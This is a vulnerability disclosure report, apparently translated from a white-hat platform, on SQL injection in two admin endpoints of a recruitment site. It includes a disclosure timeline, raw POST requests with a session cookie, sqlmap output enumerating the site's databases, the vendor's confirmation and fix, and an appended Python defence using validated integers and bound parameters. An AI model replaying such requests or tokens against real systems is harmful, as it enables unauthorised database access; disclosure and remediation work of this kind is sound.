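2015-08-17: Details reported to the vendor; awaiting vendor handling
2015-08-18: Vendor confirmed; details disclosed to the vendor only
2015-08-28: Details disclosed to core white hats and experts in related fields
2015-09-07: Details disclosed to ordinary white hats
2015-09-16: Vendor fixed the vulnerability and proactively disclosed it; details disclosed to the public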
Injection. If the vendor ignores this, I'll be heartbroken!!!
POST /admin.php/hr/hrlist_edit_submit HTTP/1.1
Content-Length: 123
Content-Type: application/x-www-form-urlencoded
Referer: http://zhaopin.now.cn/
Cookie: ci_session=zFdKnr98gKCM2rTGy7vNpGdUbk8opWag91WbTd4FwG5uEv5SKqwTv2fSkMQxVyDTrZH8KI5qnWebyS%2Fe2%2B%2BF4y3rLdAeK3KXwOpuuCcKNE3n0jTTjJ8dQTjZbZI0mc%2BGbS1sTYMuIWPyYxwketkzNP1a3dTRma4axJA9%2BM5cap6vDkq4tYPBazdcZTfvxr9pxmqFXL%2B70ZE1z6MEz72FeyR%2B%2BTVWr7SyGbetc2u%2FoY80Dv8jdUcCHMIiwZ6hYxV%2FVbOGHndqpgxwXlxk6UXzOFxWGuJkZwDJ9p%2F6gn9hO8Iy9erKIaFKoA7lLUBxO8PT%2Bw2%2Bo%2B608Y0zFOkPTHran5HeVTtSH1JK6CGcgtINwCQX3ck%2BOTL1K9AanrdpJ3xOoG10dXBpC9B6P0TaVYuAqGp%2F%2FsXHf4ioZxCigN6Rb7hPPBPNWMaOd9vJ3RvufbpYgkfFhEV7FClBdzZjvG3O2TpGWP23%2BXgu%2FoowuMTajqTCBrkyOzJnFwly8OBu73Xcc6bf42d44f8bb398fc48b6601d9e073a8a494900
Host: zhaopin.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

id[]=&interviewdate=01/01/1967&interviewnoon=%e4%b8%8a%e5%8d%88&interviewtime=1&submit=%e6%8f%90%e4%ba%a4%e5%8f%91%e9%80%81
Injection parameter: id[]
POST /admin.php/article/opt HTTP/1.1
Content-Length: 74
Content-Type: application/x-www-form-urlencoded
Referer: http://zhaopin.now.cn/
Cookie: ci_session=zFdKnr98gKCM2rTGy7vNpGdUbk8opWag91WbTd4FwG5uEv5SKqwTv2fSkMQxVyDTrZH8KI5qnWebyS%2Fe2%2B%2BF4y3rLdAeK3KXwOpuuCcKNE3n0jTTjJ8dQTjZbZI0mc%2BGbS1sTYMuIWPyYxwketkzNP1a3dTRma4axJA9%2BM5cap6vDkq4tYPBazdcZTfvxr9pxmqFXL%2B70ZE1z6MEz72FeyR%2B%2BTVWr7SyGbetc2u%2FoY80Dv8jdUcCHMIiwZ6hYxV%2FVbOGHndqpgxwXlxk6UXzOFxWGuJkZwDJ9p%2F6gn9hO8Iy9erKIaFKoA7lLUBxO8PT%2Bw2%2Bo%2B608Y0zFOkPTHran5HeVTtSH1JK6CGcgtINwCQX3ck%2BOTL1K9AanrdpJ3xOoG10dXBpC9B6P0TaVYuAqGp%2F%2FsXHf4ioZxCigN6Rb7hPPBPNWMaOd9vJ3RvufbpYgkfFhEV7FClBdzZjvG3O2TpGWP23%2BXgu%2FoowuMTajqTCBrkyOzJnFwly8OBu73Xcc6bf42d44f8bb398fc48b6601d9e073a8a494900
Host: zhaopin.now.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

action=del_allheckbox%5b%5d=1&chkall=check&submit=%e6%89%a7%e8%a1%8c
Injection parameter: checkbox[]
available databases [9]:
[*] #mysql50#lost+found
[*] db_now_net_cn
[*] information_schema
[*] mysql
[*] performance_schema
[*] proftpd
[*] test
[*] webphone
[*] webphone_center
Let's look at the current database!
>>>> So many that sqlmap can't fit them all <<<<<
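Severity: High
Vulnerability Rank: 10
Confirmed at: 2015-08-18 12:57
We will fix this as soon as possible. Thank you, white-hat brother, for reporting the vulnerability ^_^
2015-09-16: Fixed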
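
Both injectable parameters in the report are array-style form fields (id[] and checkbox[]). The following is an added example, not the vendor's code, of handling such a field on the server: every element is validated as an integer and bound through placeholders instead of being concatenated into the statement. Python with sqlite3 stands in for the application's stack; the article table, the function names and the MAX_IDS limit are assumptions.

```python
import sqlite3
from urllib.parse import parse_qs

MAX_IDS = 100  # assumed upper bound for one batch operation


def int_list(body: str, field: str) -> list[int]:
    """Return an array-style form field such as 'id[]' as a list of ints.

    Raises ValueError unless every element is a plain ASCII decimal number.
    """
    # keep_blank_values=True so an empty element ('id[]=') is seen and rejected
    values = parse_qs(body, keep_blank_values=True).get(field, [])
    if not values or len(values) > MAX_IDS:
        raise ValueError(f"{field}: expected 1..{MAX_IDS} values")
    ids = []
    for value in values:
        if not (value.isascii() and value.isdigit() and len(value) <= 10):
            raise ValueError(f"{field}: non-integer element rejected")
        ids.append(int(value))
    return ids


def delete_articles(db: sqlite3.Connection, body: str) -> int:
    """Batch delete driven by checkbox[]; returns the number of rows removed."""
    ids = int_list(body, "checkbox[]")
    # One placeholder per element: the values never become part of the SQL text
    placeholders = ",".join("?" for _ in ids)
    cur = db.execute(f"DELETE FROM article WHERE id IN ({placeholders})", ids)
    db.commit()
    return cur.rowcount


def make_db() -> sqlite3.Connection:
    """Constructed sample data: five rows in a hypothetical 'article' table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO article VALUES (?, ?)",
                   [(i, f"post {i}") for i in range(1, 6)])
    return db


if __name__ == "__main__":
    db = make_db()
    print(delete_articles(db, "action=del_all&checkbox%5b%5d=1&checkbox%5b%5d=3"))
    try:
        delete_articles(db, "checkbox%5b%5d=1%20OR%201%3D1")
    except ValueError as exc:
        print("rejected:", exc)
```

The empty id[]= element in the first request above is rejected by the same check, because blank values are kept rather than silently dropped.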